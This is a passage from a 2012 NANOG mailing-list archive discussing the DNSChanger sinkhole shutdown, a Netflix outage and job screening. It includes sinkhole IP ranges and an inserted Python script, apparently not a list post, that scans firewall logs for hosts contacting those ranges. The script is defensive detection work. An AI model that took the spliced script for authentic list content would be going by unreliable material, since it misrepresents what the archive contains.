In-Reply-To: <9602.1341597996@turing-police.cc.vt.edu>
References: <2730A40A53ADE9418D5F58E734953DF42B014C0F9F@exchange.corp.fpu-tn.com> <4FF71E77.7050307@gmail.com> <8158.1341596655@turing-police.cc.vt.edu> <4FF7251A.2040003@rollernet.us> <9602.1341597996@turing-police.cc.vt.edu>
Message-ID: <72F9A69DCF990443B2CEC064E605CE064A8177@Pascal.zaphodb.org>

> -----Original Message-----
> From: valdis.kletnieks at vt.edu [mailto:valdis.kletnieks at vt.edu]
> Sent: Friday, July 06, 2012 11:07 AM
> To: Cameron Byrne
> Cc: nanog at nanog.org
> Subject: Re: DNS Changer items
>
> On Fri, 06 Jul 2012 10:52:56 -0700, Cameron Byrne said:
> > So instead of turning the servers off, would it not have been helpful to have the servers return a "captive portal" type of response
>
> Not all DNS lookups are for HTTP.

[Tomas L. Byrnes] It's still better to do this than simply turn off all resolution.

From owen at delong.com Fri Jul 6 15:08:13 2012
From: owen at delong.com (Owen DeLong)
Date: Fri, 6 Jul 2012 13:08:13 -0700
Subject: job screening question
In-Reply-To:
References: <261c1042fd294e4da35a00b5f95a154f@mail.dessus.com>
Message-ID:

On Jul 6, 2012, at 12:23 PM, Tyler Haske wrote:

> DNA; Homo Sapien.
>
> Smart questions get smart answers.
>
> If you want HR to test technical knowledge just make a multiple choice test. (Course then you open a new can of worms).
>

One of my employers did exactly this.
I provided the answers I believed to be most likely what they were looking for, in addition to a set of corrections to the questions.

Owen

From andrew.fried at gmail.com Fri Jul 6 15:15:43 2012
From: andrew.fried at gmail.com (Andrew Fried)
Date: Fri, 06 Jul 2012 16:15:43 -0400
Subject: DNS Changer items
In-Reply-To: <72F9A69DCF990443B2CEC064E605CE064A8176@Pascal.zaphodb.org>
References: <2730A40A53ADE9418D5F58E734953DF42B014C0F9F@exchange.corp.fpu-tn.com> <4FF71E77.7050307@gmail.com> <8158.1341596655@turing-police.cc.vt.edu> <4FF7251A.2040003@rollernet.us> <4FF72B49.2020302@gmail.com> <72F9A69DCF990443B2CEC064E605CE064A8176@Pascal.zaphodb.org>
Message-ID: <4FF7476F.5030809@gmail.com>

Cameron,

That idea had been brought up. Also discussed was short durations of random blackouts of dns resolution to impress upon the infected users that they needed to take action. Unfortunately, taking either of those actions would have exceeded the authorization of the court order.

We're coming up with a pretty detailed list of "lessons learned" from this operation, and being able to implement ideas like yours will hopefully be considered in advance "next time".

Andy

Andrew Fried
andrew.fried at gmail.com

On 7/6/12 3:58 PM, Tomas L. Byrnes wrote:
> I think having the ISC DNS changer sinkhole servers return the DCWG check page IP for all queries would be a good final act.
>
>> -----Original Message-----
>> From: Andrew Fried [mailto:andrew.fried at gmail.com]
>> Sent: Friday, July 06, 2012 11:16 AM
>> To: Cameron Byrne
>> Cc: nanog at nanog.org
>> Subject: Re: DNS Changer items
>>
>> The DNS redirection began on November 8, 2011. The servers were instrumented to capture a very small portion of the dns data (source ip and port only) so that reports of infected users could be sent to the ISPs via reporting organizations like Shadowserver.
>>
>> Some ISPs did create walled gardens. Some merely redirected affected customers to their own internal DNS servers.
>> Some ISPs did aggressive notifications to their users. And some ISPs did nothing.
>>
>> Sites were set up to allow users to check their systems (dns-ok.us, etc). The DCWG set up an information site to provide information on how to detect the DNSchanger infection and how to fix it. AV companies provided tools to help clean up systems, and the tools were published on the DCWG.org website.
>>
>> The FBI went to great lengths to get press coverage to get the word out.
>>
>> This operation has been ongoing for 7 months, 27 days and 14 hours.
>>
>> How much more of a graceful ramp down could there have been?
>>
>> Andy
>>
>> Andrew Fried
>> andrew.fried at gmail.com
>>
>>
>> On 7/6/12 1:52 PM, Cameron Byrne wrote:
>>> So instead of turning the servers off, would it not have been helpful to have the servers return a "captive portal" type of response saying "hey, since you use this server, you are broken, go here to get fixed"
>>>
>>> Seems that would have been a more graceful ramp down.
>>>
>>> CB
>>>
>>
>

From r.engehausen at gmail.com Fri Jul 6 15:45:55 2012
From: r.engehausen at gmail.com (Roy)
Date: Fri, 06 Jul 2012 13:45:55 -0700
Subject: DNS Changer items
In-Reply-To: <4FF7476F.5030809@gmail.com>
References: <2730A40A53ADE9418D5F58E734953DF42B014C0F9F@exchange.corp.fpu-tn.com> <4FF71E77.7050307@gmail.com> <8158.1341596655@turing-police.cc.vt.edu> <4FF7251A.2040003@rollernet.us> <4FF72B49.2020302@gmail.com> <72F9A69DCF990443B2CEC064E605CE064A8176@Pascal.zaphodb.org> <4FF7476F.5030809@gmail.com>
Message-ID: <4FF74E83.6090902@gmail.com>

On 7/6/2012 1:15 PM, Andrew Fried wrote:
> Cameron,
>
> That idea had been brought up. Also discussed was short durations of random blackouts of dns resolution to impress upon the infected users that they needed to take action. Unfortunately, taking either of those actions would have exceeded the authorization of the court order.
>
> We're coming up with a pretty detailed list of "lessons learned" from this operation and being able to implement ideas like yours will hopefully be considered in advance "next time".
>
> Andy
>
> Andrew Fried
> andrew.fried at gmail.com
>
>

Doesn't the court order expire as of Monday? What happens to those IP ranges then?

From dgolding at ragingwire.com Fri Jul 6 15:50:34 2012
From: dgolding at ragingwire.com (Dan Golding)
Date: Fri, 6 Jul 2012 13:50:34 -0700
Subject: FYI Netflix is down
In-Reply-To:
References:
Message-ID: <1C7B96053DD7814496A0D1E71661B68302CF607C@SMF-ENTXM-001.sac.ragingwire.net>

> -----Original Message-----
>
> I imagine Netflix is mature enough to track this data as you suggest, and that's why they use AWS - downtime isn't a big deal for their business unless it gets really, really bad.

There is another possibility that is probably much more widespread amongst AWS (and other cloud) customers. Here is the scenario:

You are a small, hungry startup. No capital for servers. Cloud seems great. Then, big growth hits! Cloud seems even better - you may have the capital now, thanks to friendly VC/public investment/private equity, but you don't have the time to catch up. So, keep using cloud. Then, the now mid-sized company discovers one day that their use of the cloud is no longer economical, if it ever was. They are big enough to use a dedicated hardware in colocation or wholesale datacenter solution, with blended transit from some upstreams. But the cost to transition out of cloud is big, too. So, they might go with a hybrid strategy, at least for a few years.

This happens all the time. Not saying Netflix is doing this, but lots of other folks are. It's a trap that's easy to fall into. Especially with rapid growth.

- Dan

From tomb at byrneit.net Fri Jul 6 16:23:34 2012
From: tomb at byrneit.net (Tomas L.
Byrnes)
Date: Fri, 6 Jul 2012 14:23:34 -0700
Subject: DNS Changer items
In-Reply-To: <2730A40A53ADE9418D5F58E734953DF42B014C0FA5@exchange.corp.fpu-tn.com>
References: <2BC6678E-B339-4DA8-9D2E-9C8B7A89D1EA@merike.com> <2730A40A53ADE9418D5F58E734953DF42B014C0FA5@exchange.corp.fpu-tn.com>
Message-ID: <72F9A69DCF990443B2CEC064E605CE064A8179@Pascal.zaphodb.org>

For anyone who wants to find any hosts behind their firewall that are still infected, you can post a firewall log into our public site, and we'll call out all attempts to contact the sinkhole servers (with the internal IPs), assuming you log outbound DNS or all connections.

http://www.threatstop.com/dnschanger

We've been doing this for subscribers (including free community ones) since we got the sinkhole IPs from Andrew @ SIE/MAAWG.

> -----Original Message-----
> From: Eric J Esslinger [mailto:eesslinger at fpu-tn.com]
> Sent: Friday, July 06, 2012 11:10 AM
> To: 'nanog at nanog.org'
> Subject: RE: DNS Changer items
>
> We verified one a while back, who had already had the problem fixed when the FBI sent us the physical mail. Considering the number of internet customers in the US vs our internet customers, with the known number of US subscribers affected at its height, I figure if the percentages are good we've taken care of several times the number of likely cases on our network with that one customer.
> *wink*
> I'm told by various sources to expect similar stories on the nightly national news programs tonight, with a similar 'call your isp' ending. I've also heard the site IS reachable via ipv6 and they are dealing with the load issues as we speak (and some people are getting through, albeit slowly).
>
> I'm pretty comfortable about my network; I've been catching dns lookup destinations from my users for months (not contents, just destination ip's) and the list of outside addresses covers most of the well known public dns servers (open dns, google, etc...)
> with the exception of a handful that seem to be running their own full blown recursive caching servers, which go everywhere looking for authoritative lookups. (One I knew about, he complains because I won't allow his basic cable account act as an open server for his DNS when he's out of town. If he wants a static IP I can arrange opening the port, till then... He is always welcome to VPN into his home network as well.)
>
> Been having callers look up their IP, then checking the query logs to see if they hit our dns servers. So far I'm at 100%
>
> I thought of whipping up a script for my recursive DNS servers to setup a webpage to let them see if they were accessing those servers, but I just don't have time right now (fiscal year just started and everyone wants their projects done 'now'.)
>
> Addendum: Site appears up and fast now. So that's something anyway.
>
> __________________________
> Eric Esslinger
> Information Services Manager - Fayetteville Public Utilities http://www.fpu-tn.com/
> (931)433-1522 ext 165
>
>
> > -----Original Message-----
> > From: Merike Kaeo [mailto:kaeo at merike.com]
> > Sent: Friday, July 06, 2012 1:06 PM
> > To: Cameron Byrne
> > Cc: nanog at nanog.org
> > Subject: Re: DNS Changer items
> >
> >
> > The ISPs who have been proactive in mitigating and redirecting have been/are doing this. (global reach here)
> >
> > The court ordered DNS servers have been up since Nov 9th and lots of outreach done....the intent was a graceful ramp down.
> > Sadly, the state of folks helping with overall malware cleanup is still lots of finger pointing.
> >
> > FUD with press and over sensationalism not helping.
> >
> >
> > - merike
> >
> >
> > On Jul 6, 2012, at 10:52 AM, Cameron Byrne wrote:
> >
> > > So instead of turning the servers off, would it not have been helpful to have the servers return a "captive portal" type of response saying "hey, since you use this server, you are broken, go here to get fixed"
> > >
> > > Seems that would have been a more graceful ramp down.
> > >
> > > CB
> >
> >
>
> This message may contain confidential and/or proprietary information and is intended for the person/entity to whom it was originally addressed. Any use by others is strictly prohibited.

From jra at baylink.com Fri Jul 6 16:40:07 2012
From: jra at baylink.com (Jay Ashworth)
Date: Fri, 6 Jul 2012 17:40:07 -0400 (EDT)
Subject: [outages] www.dns-ok.us down
In-Reply-To: <2730A40A53ADE9418D5F58E734953DF42B014C0FA0@exchange.corp.fpu-tn.com>
Message-ID: <30178430.13016.1341610807899.JavaMail.root@benjamin.baylink.com>

So... might large and medium ISPs not redirect DNS to those known addresses to a resolver in house, which would log the client IPs and let them know whom to address?

Cheers,
-- jra

----- Original Message -----
> From: "Eric J Esslinger"
> To: "outages at outages.org"
> Sent: Friday, July 6, 2012 12:39:56 PM
> Subject: [outages] www.dns-ok.us down

> As per subject, the DNS Changer Working Group (DCWG) site for the US is down atm. Also another very probably related issue; Foxnews, CNN, and MSNBC have all apparently run stories in the last few hours about how the internet end is nigh, everyone is infected, and if you have any questions call your isp. (Hype levels varied per channel, I'm told as well).
>
> __________________________
> Eric Esslinger
> Information Services Manager - Fayetteville Public Utilities
> http://www.fpu-tn.com/
> (931)433-1522 ext 165
>
> This message may contain confidential and/or proprietary information and is intended for the person/entity to whom it was originally addressed.
> Any use by others is strictly prohibited.
>
> _______________________________________________
> Outages mailing list
> Outages at outages.org
> https://puck.nether.net/mailman/listinfo/outages

--
Jay R. Ashworth                  Baylink                       jra at baylink.com
Designer                     The Things I Think                       RFC 2100
Ashworth & Associates     http://baylink.pitas.com         2000 Land Rover DII
St Petersburg FL USA      http://photo.imageinc.us             +1 727 647 1274

From semenko at alum.mit.edu Fri Jul 6 16:44:28 2012
From: semenko at alum.mit.edu (Nick Semenkovich)
Date: Fri, 6 Jul 2012 16:44:28 -0500
Subject: DNS Changer items
In-Reply-To: <72F9A69DCF990443B2CEC064E605CE064A8179@Pascal.zaphodb.org>
References: <2BC6678E-B339-4DA8-9D2E-9C8B7A89D1EA@merike.com> <2730A40A53ADE9418D5F58E734953DF42B014C0FA5@exchange.corp.fpu-tn.com> <72F9A69DCF990443B2CEC064E605CE064A8179@Pascal.zaphodb.org>
Message-ID:

>
> We've been doing this for subscribers (including free community ones) since we got the sinkhole IPs from Andrew @ SIE/MAAWG.
>

At least now, the ranges are publicly outlined in http://www.fbi.gov/news/stories/2011/november/malware_110911/DNS-changer-malware.pdf

85.255.112.0 through 85.255.127.255
67.210.0.0 through 67.210.15.255
93.188.160.0 through 93.188.167.255
77.67.83.0 through 77.67.83.255
213.109.64.0 through 213.109.79.255
64.28.176.0 through 64.28.191.255

These also return the "RED" dnschanger page:

$ dig +short @64.28.180.1 dns-ok.us
38.68.193.97

- Nick

--
Nick Semenkovich
Laboratory of Dr. Jeffrey I. Gordon
Medical Scientist Training Program
School of Medicine
Washington University in St.
Louis
http://web.mit.edu/semenko/

From goemon at anime.net Fri Jul 6 17:07:51 2012
From: goemon at anime.net (goemon at anime.net)
Date: Fri, 6 Jul 2012 15:07:51 -0700 (PDT)
Subject: job screening question
In-Reply-To: <4FF70945.4050507@foobar.org>
References: <86obntzj2y.fsf@seastrom.com> <20120706074242.GY2221@hezmatt.org> <40593.1341587570@turing-police.cc.vt.edu> <4FF70945.4050507@foobar.org>
Message-ID:

On Fri, 6 Jul 2012, Nick Hilliard wrote:
> On 06/07/2012 16:12, valdis.kletnieks at vt.edu wrote:
>> On Fri, 06 Jul 2012 17:42:42 +1000, Matthew Palmer said:
>>> Ugh, I know someone (thankfully no longer a current colleague) who ardently *defends* his use of questions like "what does the -M option to ps do?" on
>> Is that an African ps or a European ps? ;)
> I'll admit that I once asked a question like that in an interview, but it was only because the candidate had said that he was an expert with the "tar" command. If you're going to be that full of poop on a CV, you should expect to be called up on it.

This is what baffles me. People keep putting stuff on their resume that they simply don't know anything about. TCP/IP expert, yet they don't know SYN/SYNACK/ACK or subnetting. HTTP expert but they don't know what a 200 response is.

-Dan

From valdis.kletnieks at vt.edu Fri Jul 6 17:25:18 2012
From: valdis.kletnieks at vt.edu (valdis.kletnieks at vt.edu)
Date: Fri, 06 Jul 2012 18:25:18 -0400
Subject: job screening question
In-Reply-To: Your message of "Fri, 06 Jul 2012 15:07:51 -0700."
References: <86obntzj2y.fsf@seastrom.com> <20120706074242.GY2221@hezmatt.org> <40593.1341587570@turing-police.cc.vt.edu> <4FF70945.4050507@foobar.org>
Message-ID: <25808.1341613518@turing-police.cc.vt.edu>

On Fri, 06 Jul 2012 15:07:51 -0700, goemon at anime.net said:
> This is what baffles me. People keep putting stuff on their resume that they simply don't know anything about. TCP/IP expert, yet they don't know SYN/SYNACK/ACK or subnetting.
> HTTP expert but they don't know what a 200 response is.

The Friday afternoon cynic in me says it's because it's a move with positive paybacks. There's 3 basic possibilities:

1) You send the puffed resume to a company with clue, it gets recognized as puffed, and you don't get the job. Zero loss, you weren't going to get that job anyhow.

2) You send a boring unpuffed resume to a company sans clue. They recognize it as boring because there's only 3 buzzwords on 2 pages, and you don't get the job. Loss.

3) You send a puffed resume, and the guy doing the hiring doesn't know what the 3-packet mating call of the Internet is *either*. Win.

From deleskie at gmail.com Fri Jul 6 17:27:16 2012
From: deleskie at gmail.com (jim deleskie)
Date: Fri, 6 Jul 2012 19:27:16 -0300
Subject: job screening question
In-Reply-To: <25808.1341613518@turing-police.cc.vt.edu>
References: <86obntzj2y.fsf@seastrom.com> <20120706074242.GY2221@hezmatt.org> <40593.1341587570@turing-police.cc.vt.edu> <4FF70945.4050507@foobar.org> <25808.1341613518@turing-police.cc.vt.edu>
Message-ID:

Pascal's wager.. almost :)

On Fri, Jul 6, 2012 at 7:25 PM, wrote:
> On Fri, 06 Jul 2012 15:07:51 -0700, goemon at anime.net said:
>
>> This is what baffles me. People keep putting stuff on their resume that they simply don't know anything about. TCP/IP expert, yet they don't know SYN/SYNACK/ACK or subnetting. HTTP expert but they don't know what a 200 response is.
>
> The Friday afternoon cynic in me says it's because it's a move with positive paybacks. There's 3 basic possibilities:
>
> 1) You send the puffed resume to a company with clue, it gets recognized as puffed, and you don't get the job. Zero loss, you weren't going to get that job anyhow.
>
> 2) You send a boring unpuffed resume to a company sans clue.
> They recognize it as boring because there's only 3 buzzwords on 2 pages, and you don't get the job. Loss.
>
> 3) You send a puffed resume, and the guy doing the hiring doesn't know what the 3-packet mating call of the Internet is *either*. Win.
>

From andrew.fried at gmail.com Fri Jul 6 17:54:43 2012
From: andrew.fried at gmail.com (Andrew Fried)
Date: Fri, 06 Jul 2012 18:54:43 -0400
Subject: DNS Changer items
In-Reply-To: <4FF74E83.6090902@gmail.com>
References: <2730A40A53ADE9418D5F58E734953DF42B014C0F9F@exchange.corp.fpu-tn.com> <4FF71E77.7050307@gmail.com> <8158.1341596655@turing-police.cc.vt.edu> <4FF7251A.2040003@rollernet.us> <4FF72B49.2020302@gmail.com> <72F9A69DCF990443B2CEC064E605CE064A8176@Pascal.zaphodb.org> <4FF7476F.5030809@gmail.com> <4FF74E83.6090902@gmail.com>
Message-ID: <4FF76CB3.7050500@gmail.com>

The subnets will probably be held until the conclusion of the criminal trials. After that, the addresses may be held back from assignment for a while (e.g. a year), but eventually they'll get reassigned.

Andrew Fried
andrew.fried at gmail.com

On 7/6/12 4:45 PM, Roy wrote:
> On 7/6/2012 1:15 PM, Andrew Fried wrote:
>> Cameron,
>>
>> That idea had been brought up. Also discussed was short durations of random blackouts of dns resolution to impress upon the infected users that they needed to take action. Unfortunately, taking either of those actions would have exceeded the authorization of the court order.
>>
>> We're coming up with a pretty detailed list of "lessons learned" from this operation and being able to implement ideas like yours will hopefully be considered in advance "next time".
>>
>> Andy
>>
>> Andrew Fried
>> andrew.fried at gmail.com
>>
>>
>
>
> Doesn't the court order expire as of Monday? What happens to those IP ranges then?
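A defender-side check along the lines of what Tomas and Eric describe earlier in the thread (scan outbound firewall logs for internal hosts still sending traffic to the sinkhole addresses, using the six ranges Nick quoted from the FBI PDF), as an added example that is not code from ThreatStop, the DCWG or any poster; the key=value log format, the fw1 device name and the 192.168.1.x hosts are constructed for the example.

```python
"""Spot internal hosts that still talk to the DNSChanger sinkhole ranges by
scanning outbound firewall log lines.

Added example for this thread; not code from ThreatStop, the DCWG or any poster.
The six address ranges are the ones quoted in the thread from the FBI PDF.
The log line format and the 192.168.1.x hosts are constructed for this example.
"""
import ipaddress
import re

# Start/end pairs exactly as listed in the thread (FBI DNSChanger PDF).
SINKHOLE_RANGES = [
    ("85.255.112.0", "85.255.127.255"),
    ("67.210.0.0", "67.210.15.255"),
    ("93.188.160.0", "93.188.167.255"),
    ("77.67.83.0", "77.67.83.255"),
    ("213.109.64.0", "213.109.79.255"),
    ("64.28.176.0", "64.28.191.255"),
]


def sinkhole_networks(ranges=SINKHOLE_RANGES):
    """Convert the start/end pairs into CIDR networks, letting the stdlib do
    the prefix arithmetic instead of hand-typing /20s and /21s."""
    nets = []
    for first, last in ranges:
        nets.extend(ipaddress.summarize_address_range(
            ipaddress.ip_address(first), ipaddress.ip_address(last)))
    return nets


SINKHOLE_NETS = sinkhole_networks()


def is_sinkhole(addr, nets=SINKHOLE_NETS):
    """True if addr falls inside one of the sinkhole ranges. A non-address
    (hostname, empty field) is treated as no match rather than an error."""
    try:
        ip = ipaddress.ip_address(addr)
    except ValueError:
        return False
    return any(ip in net for net in nets)


# Constructed key=value log format: timestamp, device, direction, then fields,
# roughly what a normalised iptables LOG or firewall export looks like.
LINE_RE = re.compile(
    r"^(?P<ts>\S+)\s+.*?\bsrc=(?P<src>[\d.]+)\s+dst=(?P<dst>[\d.]+)"
    r"\s+proto=(?P<proto>\w+)\s+dport=(?P<dport>\d+)"
)


def parse_line(line):
    """Return the fields of one log line as a dict, or None if it does not
    match, so a malformed line is skipped instead of aborting the scan."""
    m = LINE_RE.match(line)
    if not m:
        return None
    fields = m.groupdict()
    fields["dport"] = int(fields["dport"])
    return fields


def scan_log(lines):
    """Map each internal source IP to the (timestamp, dst, proto, dport)
    attempts it made toward a sinkhole address. Every destination port
    counts, not just UDP/53: the check is for any attempt to contact the
    sinkhole servers, which is what Tomas's log check looks for."""
    hits = {}
    for line in lines:
        rec = parse_line(line)
        if rec is None or not is_sinkhole(rec["dst"]):
            continue
        hits.setdefault(rec["src"], []).append(
            (rec["ts"], rec["dst"], rec["proto"], rec["dport"]))
    return hits


def report(lines):
    """Human-readable summary, one line per still-affected internal host."""
    out = []
    for src, attempts in sorted(scan_log(lines).items()):
        dsts = sorted({a[1] for a in attempts})
        out.append(f"{src}: {len(attempts)} attempt(s) to sinkhole {', '.join(dsts)}")
    return out


# Constructed sample: one clean host, two still pointed at sinkhole addresses,
# a malformed line, and a near miss (93.188.170.2 is just outside
# 93.188.160.0 through 93.188.167.255 and must not match).
SAMPLE_LOG = """\
2012-07-06T12:01:03 fw1 OUT src=192.168.1.23 dst=64.28.180.1 proto=udp dport=53
2012-07-06T12:01:04 fw1 OUT src=192.168.1.40 dst=8.8.8.8 proto=udp dport=53
2012-07-06T12:01:09 fw1 OUT src=192.168.1.23 dst=85.255.116.7 proto=udp dport=53
2012-07-06T12:02:11 fw1 OUT src=192.168.1.77 dst=93.188.170.2 proto=tcp dport=80
2012-07-06T12:02:30 fw1 OUT src=192.168.1.77 dst=213.109.70.1 proto=tcp dport=80
this line is garbage and must be skipped
"""

if __name__ == "__main__":
    for net in SINKHOLE_NETS:
        print("sinkhole range:", net)
    for line in report(SAMPLE_LOG.splitlines()):
        print(line)
```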
From nick at foobar.org Fri Jul 6 18:07:57 2012
From: nick at foobar.org (Nick Hilliard)
Date: Sat, 07 Jul 2012 00:07:57 +0100
Subject: job screening question
In-Reply-To: <25808.1341613518@turing-police.cc.vt.edu>
References: <86obntzj2y.fsf@seastrom.com> <20120706074242.GY2221@hezmatt.org> <40593.1341587570@turing-police.cc.vt.edu> <4FF70945.4050507@foobar.org> <25808.1341613518@turing-police.cc.vt.edu>
Message-ID: <4FF76FCD.6070405@foobar.org>

On 06/07/2012 23:25, valdis.kletnieks at vt.edu wrote:
> The Friday afternoon cynic in me says it's because it's a move with positive paybacks. There's 3 basic possibilities:
>
> 1) You send the puffed resume to a company with clue, it gets recognized as puffed, and you don't get the job. Zero loss, you weren't going to get that job anyhow.
>
> 2) You send a boring unpuffed resume to a company sans clue. They recognize it as boring because there's only 3 buzzwords on 2 pages, and you don't get the job. Loss.
>
> 3) You send a puffed resume, and the guy doing the hiring doesn't know what the 3-packet mating call of the Internet is *either*. Win.

or:

4) you get caught out in the interview as being puffed up, but the company hires you anyway despite strongly worded objections from the interviewer, causing the interviewer's eyes to spin in their sockets at the inanity of the decision. You then spend your entire employment at the company proving your ineptitude beyond all possible doubt.

I think this is a win, is it?

Nick

From valdis.kletnieks at vt.edu Fri Jul 6 18:09:54 2012
From: valdis.kletnieks at vt.edu (valdis.kletnieks at vt.edu)
Date: Fri, 06 Jul 2012 19:09:54 -0400
Subject: job screening question
In-Reply-To: Your message of "Sat, 07 Jul 2012 00:07:57 +0100."
<4FF76FCD.6070405@foobar.org>
References: <86obntzj2y.fsf@seastrom.com> <20120706074242.GY2221@hezmatt.org> <40593.1341587570@turing-police.cc.vt.edu> <4FF70945.4050507@foobar.org> <25808.1341613518@turing-police.cc.vt.edu> <4FF76FCD.6070405@foobar.org>
Message-ID: <28572.1341616194@turing-police.cc.vt.edu>

On Sat, 07 Jul 2012 00:07:57 +0100, Nick Hilliard said:
> 4) you get caught out in the interview as being puffed up, but the company hires you anyway despite strongly worded objections from the interviewer, causing the interviewer's eyes to spin in their sockets at the inanity of the decision. You then spend your entire employment at the company proving your ineptitude beyond all possible doubt.
>
> I think this is a win, is it?

Yeah - it's a better gig than you would have landed otherwise, isn't it? :)

From george.herbert at gmail.com Fri Jul 6 18:16:01 2012
From: george.herbert at gmail.com (George Herbert)
Date: Fri, 6 Jul 2012 16:16:01 -0700
Subject: job screening question
In-Reply-To: <4FF76FCD.6070405@foobar.org>
References: <86obntzj2y.fsf@seastrom.com> <20120706074242.GY2221@hezmatt.org> <40593.1341587570@turing-police.cc.vt.edu> <4FF70945.4050507@foobar.org> <25808.1341613518@turing-police.cc.vt.edu> <4FF76FCD.6070405@foobar.org>
Message-ID:

On Fri, Jul 6, 2012 at 4:07 PM, Nick Hilliard wrote:
> On 06/07/2012 23:25, valdis.kletnieks at vt.edu wrote:
>> The Friday afternoon cynic in me says it's because it's a move with positive paybacks. There's 3 basic possibilities:
>>
>> 1) You send the puffed resume to a company with clue, it gets recognized as puffed, and you don't get the job. Zero loss, you weren't going to get that job anyhow.
>>
>> 2) You send a boring unpuffed resume to a company sans clue.
>> They recognize it as boring because there's only 3 buzzwords on 2 pages, and you don't get the job. Loss.
>>
>> 3) You send a puffed resume, and the guy doing the hiring doesn't know what the 3-packet mating call of the Internet is *either*. Win.
>
> or:
>
> 4) you get caught out in the interview as being puffed up, but the company hires you anyway despite strongly worded objections from the interviewer, causing the interviewer's eyes to spin in their sockets at the inanity of the decision. You then spend your entire employment at the company proving your ineptitude beyond all possible doubt.
>
> I think this is a win, is it?

There's also

5) Didn't have enough clue about the real world to know you were puffing your resume up.

6) Puffed it up a little (worked with Cisco routers, but in the 7200 era, and hasn't categorized skills as recent / older), but hasn't outright lied.

I get resumes all the time that are off in some direction. Usually 5) - inflated due to lack of industry scope understanding, some 6). Neither of these is a disqualifier per se. The question is what do they do when you start asking questions and putting it into context. If they put old skills down and admit it, that's fine, just ask them how recent all the various things are and note it down. If they don't have a clue ("But we had IPv6 coursework in university last semester!") they may be an OK beginner. If you're hiring for a junior position that's fine. If you're hiring for a more senior one, I usually let them down gently and explain the scope and breadth of the things they put down and help them aim their resume more accurately in the future.

I've had people try to BS me in the interview or outright lie on the resume beforehand. A couple of each out of the last... 325 or so people I've interviewed? Something like that. Not very many. Easy to spot. They were not hired.
--
-george william herbert
george.herbert at gmail.com

From jared at puck.nether.net Fri Jul 6 18:19:53 2012
From: jared at puck.nether.net (Jared Mauch)
Date: Fri, 6 Jul 2012 19:19:53 -0400
Subject: [outages] www.dns-ok.us down
In-Reply-To: <30178430.13016.1341610807899.JavaMail.root@benjamin.baylink.com>
References: <30178430.13016.1341610807899.JavaMail.root@benjamin.baylink.com>
Message-ID: <974B1820-583F-42A8-ADBD-9930FAF4CE8C@puck.nether.net>

You can get that info from shadow server and others...

Jared Mauch

On Jul 6, 2012, at 5:40 PM, Jay Ashworth wrote:

> So... might large and medium ISPs not redirect DNS to those known addresses
> to a resolver in house, which would log the client IPs and let them
> know whom to address?
>
> Cheers,
> -- jra
>
> ----- Original Message -----
>> From: "Eric J Esslinger"
>> To: "outages at outages.org"
>> Sent: Friday, July 6, 2012 12:39:56 PM
>> Subject: [outages] www.dns-ok.us down
>> As per subject, the DNS Changer Working Group (DCWG) site for the US
>> is down atm. Also another very probably related issue; Foxnews, CNN,
>> and MSNBC have all apparently run stories in the last few hours about
>> how the internet end is nigh, everyone is infected, and if you have
>> any questions call your isp. (Hype levels varied per channel, I'm told
>> as well).
>>
>> __________________________
>> Eric Esslinger
>> Information Services Manager - Fayetteville Public Utilities
>> http://www.fpu-tn.com/
>> (931)433-1522 ext 165
>>
>> This message may contain confidential and/or proprietary information
>> and is intended for the person/entity to whom it was originally
>> addressed. Any use by others is strictly prohibited.
>>
>> _______________________________________________
>> Outages mailing list
>> Outages at outages.org
>> https://puck.nether.net/mailman/listinfo/outages
>
> --
> Jay R. Ashworth          Baylink                    jra at baylink.com
> Designer                 The Things I Think         RFC 2100
> Ashworth & Associates    http://baylink.pitas.com   2000 Land Rover DII
> St Petersburg FL USA     http://photo.imageinc.us   +1 727 647 1274

From andrew.fried at gmail.com Fri Jul 6 18:20:53 2012
From: andrew.fried at gmail.com (Andrew Fried)
Date: Fri, 06 Jul 2012 19:20:53 -0400
Subject: [outages] www.dns-ok.us down
In-Reply-To: <30178430.13016.1341610807899.JavaMail.root@benjamin.baylink.com>
References: <30178430.13016.1341610807899.JavaMail.root@benjamin.baylink.com>
Message-ID: <4FF772D5.7060204@gmail.com>

Some ISPs are performing internal redirection. Some, in fact, have been doing it since the takedown last November.

The redirection has to stop at some point. And keep in mind, most of the systems infected with DNSchanger have other malware running on their boxes, so keeping those systems up indefinitely is actually not a good thing.

Andy

Andrew Fried
andrew.fried at gmail.com

On 7/6/12 5:40 PM, Jay Ashworth wrote:
> So... might large and medium ISPs not redirect DNS to those known addresses
> to a resolver in house, which would log the client IPs and let them
> know whom to address?
>
> Cheers,
> -- jra

From snoble at sonn.com Fri Jul 6 18:43:56 2012
From: snoble at sonn.com (Steven Noble)
Date: Fri, 6 Jul 2012 16:43:56 -0700
Subject: job screening question
In-Reply-To:
References: <86obntzj2y.fsf@seastrom.com> <20120706074242.GY2221@hezmatt.org> <40593.1341587570@turing-police.cc.vt.edu> <4FF70945.4050507@foobar.org> <25808.1341613518@turing-police.cc.vt.edu> <4FF76FCD.6070405@foobar.org>
Message-ID:

On Jul 6, 2012, at 4:16 PM, George Herbert wrote:

> 6) Puffed it up a little (worked with Cisco routers, but in the 7200
> era, and hasn't categorized skills as recent / older), but hasn't
> outright lied.

The 7200 is still a heavily used platform today. It has no correlation with current skill sets IMHO.
From george.herbert at gmail.com Fri Jul 6 19:04:16 2012
From: george.herbert at gmail.com (George Herbert)
Date: Fri, 6 Jul 2012 17:04:16 -0700
Subject: job screening question
In-Reply-To:
References: <86obntzj2y.fsf@seastrom.com> <20120706074242.GY2221@hezmatt.org> <40593.1341587570@turing-police.cc.vt.edu> <4FF70945.4050507@foobar.org> <25808.1341613518@turing-police.cc.vt.edu> <4FF76FCD.6070405@foobar.org>
Message-ID:

On Fri, Jul 6, 2012 at 4:43 PM, Steven Noble wrote:
> On Jul 6, 2012, at 4:16 PM, George Herbert wrote:
>
>> 6) Puffed it up a little (worked with Cisco routers, but in the 7200
>> era, and hasn't categorized skills as recent / older), but hasn't
>> outright lied.
>
> The 7200 is still a heavily used platform today. It has no correlation with current skill sets IMHO.

Would s/7200/2500/g be an adequate correction?

I know of customers who still have 7200s as well, but in the context of ISP network engineering... Perhaps I'm wrong, but my impression is people on this list have generally moved on by now.

Context matters. One can always point to lingering examples of older technology (if nowhere else, the Computer History Museum 8-). The question is whether the skill is relevant in context.

I built a nationwide T-1 backbone out of Livingston IRXes once (in the early 90s) - the IRX left my resume by the late 1990s. I know of at least one still humming away in a closet, but it's not a relevant technology. I also learned (some) shell commands on a Vax 11/750 when they were new and used Apple II's when they were new, and so on. None of these are resume-appropriate now, unless I want a job at the Computer History Museum.

